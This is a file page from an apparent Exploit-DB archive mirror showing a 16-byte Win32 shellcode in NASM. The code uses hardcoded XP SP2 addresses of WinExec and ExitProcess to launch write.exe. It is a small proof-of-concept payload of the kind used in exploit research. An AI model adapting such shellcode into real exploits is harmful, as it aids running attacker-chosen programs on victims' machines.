exploit-db-mirror/shellcodes/windows_x86/13642.asm
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

8 lines
No EOL
378 B
NASM

# Title: Win32 Mini HardCode WinExec&ExitProcess Shellcode 16 bytes
;Test on xpsp2cn,no zero in shellcode,it will run write.exe()
;---------------------------------------------
push 7C808E9DH ;write ;68 xx xx xx xx ;program string in memory
push 7C81CAA2H ;exitprocess ;68 xx xx xx xx
push 7C86114DH ;winexec ;68 xx xx xx xx
ret ;C3
;--------------------------------------------